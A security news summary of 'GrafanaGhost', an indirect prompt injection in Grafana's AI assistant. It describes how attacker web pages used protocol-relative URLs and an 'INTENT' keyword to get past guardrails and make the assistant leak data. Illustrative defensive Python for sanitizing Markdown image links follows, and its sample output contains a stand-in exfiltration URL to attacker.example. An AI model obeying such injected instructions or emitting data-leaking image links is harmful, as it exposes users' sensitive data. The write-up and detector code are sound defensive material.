Security researchers at Noma discovered 'GrafanaGhost,' an indirect prompt injection vulnerability in Grafana's AI assistant that could allow attackers to exfiltrate sensitive data. When an attacker embedded malicious instructions in an attacker-controlled web page, using protocol-relative URLs and the 'INTENT' keyword to bypass guardrails, the assistant silently processed the injected commands and sent sensitive data to the attacker's server whenever a user performed normal interactions such as browsing logs. Grafana has patched the underlying issue in its Markdown image renderer. However, Grafana and Noma dispute the severity: Grafana claims the exploit required significant user interaction and that the AI warned users, while Noma insists it required fewer than two steps and operated silently, without any user-visible warning.
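The summary says the fix landed in the Markdown image renderer but not what it does. The following is an added illustration, not Grafana's or Noma's code, of the kind of check a renderer for AI-produced Markdown can apply before fetching images: reject protocol-relative URLs (which resolve against the page's own scheme and so can point at an outside host) and anything not on an allow list of image hosts, so a leaked value cannot leave in an image request. The allow-listed host name, the `INTENT`-free sample text and the exfiltration-style URL are constructed for the example; the real patch may differ.

```python
import re
from urllib.parse import urlparse

# Hosts the renderer may fetch images from. Constructed value for this example,
# not Grafana's actual configuration.
ALLOWED_IMAGE_HOSTS = {"grafana.example.internal"}

# Markdown inline image syntax: ![alt](url "optional title")
IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(\s*([^\s)]+)(?:\s+"[^"]*")?\s*\)')


def is_safe_image_url(url: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> bool:
    """True only for https URLs whose host is on the allow list.

    Protocol-relative URLs ("//host/path") are rejected explicitly: urlparse
    reports an empty scheme for them, and a browser resolves them against the
    current page's scheme, so they reach an external host while looking
    like a local path.
    """
    url = url.strip()
    if url.startswith("//"):
        return False
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return False
    if parsed.username or parsed.password:  # no userinfo tricks like https://good@evil
        return False
    return parsed.hostname is not None and parsed.hostname.lower() in allowed_hosts


def sanitize_markdown_images(text: str, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Replace disallowed image links with their alt text.

    Returns (clean_text, blocked_urls) so the caller can both render the
    safe output and log what was stripped for detection purposes.
    """
    blocked = []

    def repl(match):
        alt, url = match.group(1), match.group(2)
        if is_safe_image_url(url, allowed_hosts):
            return match.group(0)
        blocked.append(url)
        return alt  # keep the visible text, drop the image fetch

    return IMAGE_RE.sub(repl, text), blocked


# Constructed sample of assistant output: one legitimate chart, one
# protocol-relative link carrying a token in its query string, one plain-http link.
SAMPLE_OUTPUT = (
    "Here is the error rate chart: "
    "![error rate](https://grafana.example.internal/render/1.png)\n"
    "Summary: ![summary](//attacker.example/collect?data=SECRET_TOKEN)\n"
    "Also ![x](http://grafana.example.internal/plain.png)"
)

if __name__ == "__main__":
    clean, blocked = sanitize_markdown_images(SAMPLE_OUTPUT)
    print(clean)
    for url in blocked:
        print("blocked image URL:", url)
```

Logging the `blocked` list is the detection hook: an assistant that starts emitting image links toward hosts outside the allow list, or with query strings that look like copied data, is a signal worth alerting on even after the renderer refuses to fetch them.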